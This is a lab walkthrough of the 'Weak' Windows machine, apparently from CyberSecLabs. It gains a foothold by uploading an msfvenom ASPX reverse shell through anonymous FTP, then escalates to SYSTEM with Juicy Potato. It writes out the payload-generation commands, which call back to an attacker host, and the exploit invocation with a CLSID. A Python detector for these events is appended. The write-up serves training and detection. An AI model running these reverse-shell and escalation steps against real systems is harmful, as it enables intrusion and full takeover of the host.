CyberSecLabs Weak Walkthrough
RHOST = 172.31.1.11
LHOST = 172.21.1.1
Getting a Foothold
Weak is a Windows machine with port 80 open, serving an IIS welcome page.
It also allows anonymous FTP login, so we can upload an ASPX reverse shell and trigger it from the browser to get a shell back.
msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx
Privilege Escalation
Running whoami /priv shows that SeImpersonatePrivilege is enabled,
so we can perform the Juicy Potato attack.
Running systeminfo tells us it is a Windows 7 machine.
OK, so how do we perform the Juicy Potato attack?
To perform the Juicy Potato attack we need a few arguments:
JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c {CLSID_Value}
For {Any_Port} we can literally use any working port that is not blocked by Windows.
For {Program_To_Execute} we can create an msfvenom reverse-shell EXE; executing it gives us a shell back.
For {CLSID_Value} we have to find the correct CLSID value from the list.
How do we find the CLSID value?
Download the CLSID list for the target operating system.
Currently, CLSIDs have been obtained for the following operating systems:
- Windows_10_Enterprise
- Windows_10_Pro
- Windows_7_Enterprise
- Windows_8.1_Enterprise
- Windows_Server_2008_R2_Enterprise
- Windows_Server_2012_Datacenter
- Windows_Server_2016_Standard
In this scenario the target is Windows 7, so grab CLSID.list for Windows 7: Download Here
Next, download TestCLSID.bat (test_clsid.bat in the repository), which tests all the CLSIDs from the CLSID.list we pass to it.
https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat
Now upload JuicyPotato.exe, TestCLSID.bat and CLSID.list to the same folder on the victim machine.
Then execute TestCLSID.bat in a terminal and let it run for 5 minutes.
It scans the CLSIDs from CLSID.list and stores the output in result.log.
Open result.log and you should find many CLSIDs there.
Select any one CLSID from this list, but make sure it runs with higher privileges (i.e. NT AUTHORITY\SYSTEM) and not as the current user.
JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c {CLSID_Value}
Now we have all the pieces that need to be put in place:
{Any_Port} = 1337
{Program_To_Execute} = shell.exe (Generated by msfvenom)
msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe
{CLSID_Value} = 687e55ca-6621-4c41-b9f1-c0eddc94bb05
Execute
JuicyPotato.exe -l 1337 -p C:\Users\Public\Downloads\shell.exe -t * -c {687e55ca-6621-4c41-b9f1-c0eddc94bb05}
And we would get an NT AUTHORITY\SYSTEM shell back on port 443.
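A defender-side companion to the chain above, added here and not part of the original walkthrough: a small Python detector run over constructed process-creation records (fields modelled on Sysmon Event ID 1: Image, User, ParentImage, ParentUser) that flags the IIS worker spawning a shell, a SYSTEM child created by a non-SYSTEM parent (the Potato-family token jump), and SYSTEM executing a binary staged under C:\Users\Public. The sample records and the allowlist of broker parents are assumptions, not real logs.

```python
import re

# Constructed records modelled on Sysmon Event ID 1 fields (not real logs).
# The last two mimic this walkthrough: w3wp.exe -> cmd.exe as the app-pool
# identity, then a SYSTEM child spawned from C:\Users\Public by JuicyPotato.exe.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\svchost.exe User=NT AUTHORITY\SYSTEM ParentImage=C:\Windows\System32\services.exe ParentUser=NT AUTHORITY\SYSTEM",
    r"Image=C:\Windows\System32\inetsrv\w3wp.exe User=IIS APPPOOL\DefaultAppPool ParentImage=C:\Windows\System32\svchost.exe ParentUser=NT AUTHORITY\SYSTEM",
    r"Image=C:\Windows\System32\cmd.exe User=IIS APPPOOL\DefaultAppPool ParentImage=C:\Windows\System32\inetsrv\w3wp.exe ParentUser=IIS APPPOOL\DefaultAppPool",
    r"Image=C:\Users\Public\Downloads\shell.exe User=NT AUTHORITY\SYSTEM ParentImage=C:\Users\Public\Downloads\JuicyPotato.exe ParentUser=IIS APPPOOL\DefaultAppPool",
]

# Key=Value pairs whose values may contain spaces; a value ends where the next Key= starts.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
SYSTEM = "nt authority\\system"
WEB_WORKERS = ("w3wp.exe",)
SHELLS = ("cmd.exe", "powershell.exe")
# Assumed allowlist: parents that legitimately start SYSTEM processes for other users.
BROKER_PARENTS = ("services.exe", "svchost.exe", "wininit.exe", "consent.exe")


def parse_event(line: str) -> dict:
    return dict(FIELD_RE.findall(line))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(line: str) -> list:
    ev = parse_event(line)
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    user, puser = ev["User"].lower(), ev["ParentUser"].lower()
    alerts = []
    # 1. Web-shell indicator: the IIS worker process spawning an interactive shell.
    if parent in WEB_WORKERS and image in SHELLS:
        alerts.append(f"web worker {parent} spawned {image} as {ev['User']}")
    # 2. Token jump: a non-SYSTEM parent (an app-pool or service account holding
    #    SeImpersonatePrivilege) produced a SYSTEM child without a known broker.
    if user == SYSTEM and puser != SYSTEM and parent not in BROKER_PARENTS:
        alerts.append(f"SYSTEM child {image} from non-SYSTEM parent {parent} ({ev['ParentUser']})")
    # 3. SYSTEM executing a binary staged in a world-writable directory.
    if user == SYSTEM and ev["Image"].lower().startswith("c:\\users\\public\\"):
        alerts.append(f"SYSTEM ran binary from user-writable path {ev['Image']}")
    return alerts


def analyze(lines: list) -> list:
    return [alert for line in lines for alert in detect(line)]
```

Running analyze(SAMPLE_EVENTS) yields three alerts, one for the web shell and two for the SYSTEM child; the first two benign records produce none.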
That's it for this simple walkthrough of an easy Windows machine. I hope you learned something from it!